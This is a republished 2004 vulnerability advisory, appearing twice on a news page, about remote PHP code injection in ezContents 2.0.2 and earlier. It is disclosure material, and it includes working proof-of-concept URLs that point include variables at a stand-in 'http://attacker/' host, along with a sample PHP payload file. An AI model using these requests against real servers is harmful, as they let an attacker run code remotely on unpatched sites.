HNS MAIN FEED
Thursday, 03:37 EDT
- Security for Android applications
- Infiltrated SpyEye C&C server provides glimpse into botnet activity
- Gmail phishing campaign is under way
- Virtualization for Security
- Trend Micro launches Titanium 2011 security software
- NSA Director says citizens' privacy will never be compromised
- International variations in online threat perception
- The emotional impact of cybercrime
- Safari 5.0.2 addresses three vulnerabilities
- How black hat spam SEO works
- Firefox 3.6.9 fixes numerous security issues
- Facebook survey spam worm spreads like fire
ezContents 2.0.2 PHP Code Injection Vulnerability
12 February 2004
From: Cedric Cochin <cco(at)netvigilance.com>
Summary :
ezContents a free open source content management system has been found to be vulnerable to Multiple PHP Code Injection vulnerabilities. They enable a malicious user to access arbitrary files or execute commands on the server.
Details :
Multiple PHP scripts can be exploited to perform PHP Code Injection.
Vulnerable Systems:
* ezContents 2.0.2 and prior
CVE :
CAN-2004-0132
Release Date :
February 11, 2004
Severity :
HIGH
Examples :
-------------------------------------------
http://[target]/[ezContents_directory]/include/db.php?
GLOBALS[rootdp]=http://attacker/
Will import the following file into the PHP code.
- --> http://attacker/include/adodb/adodb.inc.php
Attacker just has to create the file adodb.inc.php as :
<? print "<?phpinfo();exit?>"?>
Idem with
http://[target]/[ezContents_directory]/modules/news/
archivednews.php?GLOBALS[language_home]=http://attacker/
&GLOBALS[gsLanguage]=ezContents
Will import the following file into the PHP code.
- --> http://attacker/ezContents/lang_admin.php
This vulnerability only applies when running ezContents on PHP version 4.3.0 or above (prior versions did not support the inclusion of remote files); "URL fopen wrappers" are enabled (the default); and with 'register_globals' set to "On".
This vulnerability is present in a decent number of PHP files. The behavior of version 2.0RC3 and 2.0.1 is approximatively the same. Some of the attack are not working on the both due to different include() calls. (for example the second one is not working on 2.0RC3 due to an additional "languages/" at the beginning of the include call).
Vendor Status :
The information has been provided to ezContents Support Team. A new release with fixes for these vulnerabilities is already available.
- --> http://www.ezcontents.org/forum/viewtopic.php?t=361
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
< cco at netvigilance dot com >
Summary :
ezContents a free open source content management system has been found to be vulnerable to Multiple PHP Code Injection vulnerabilities. They enable a malicious user to access arbitrary files or execute commands on the server.
Details :
Multiple PHP scripts can be exploited to perform PHP Code Injection.
Vulnerable Systems:
* ezContents 2.0.2 and prior
CVE :
CAN-2004-0132
Release Date :
February 11, 2004
Severity :
HIGH
Examples :
-------------------------------------------
http://[target]/[ezContents_directory]/include/db.php?
GLOBALS[rootdp]=http://attacker/
Will import the following file into the PHP code.
- --> http://attacker/include/adodb/adodb.inc.php
Attacker just has to create the file adodb.inc.php as :
<? print "<?phpinfo();exit?>"?>
Idem with
http://[target]/[ezContents_directory]/modules/news/
archivednews.php?GLOBALS[language_home]=http://attacker/
&GLOBALS[gsLanguage]=ezContents
Will import the following file into the PHP code.
- --> http://attacker/ezContents/lang_admin.php
This vulnerability only applies when running ezContents on PHP version 4.3.0 or above (prior versions did not support the inclusion of remote files); "URL fopen wrappers" are enabled (the default); and with 'register_globals' set to "On".
This vulnerability is present in a decent number of PHP files. The behavior of version 2.0RC3 and 2.0.1 is approximatively the same. Some of the attack are not working on the both due to different include() calls. (for example the second one is not working on 2.0RC3 due to an additional "languages/" at the beginning of the include call).
Vendor Status :
The information has been provided to ezContents Support Team. A new release with fixes for these vulnerabilities is already available.
- --> http://www.ezcontents.org/forum/viewtopic.php?t=361
Credit :
Cedric Cochin, Security Engineer, netVigilance, inc.
< cco at netvigilance dot com >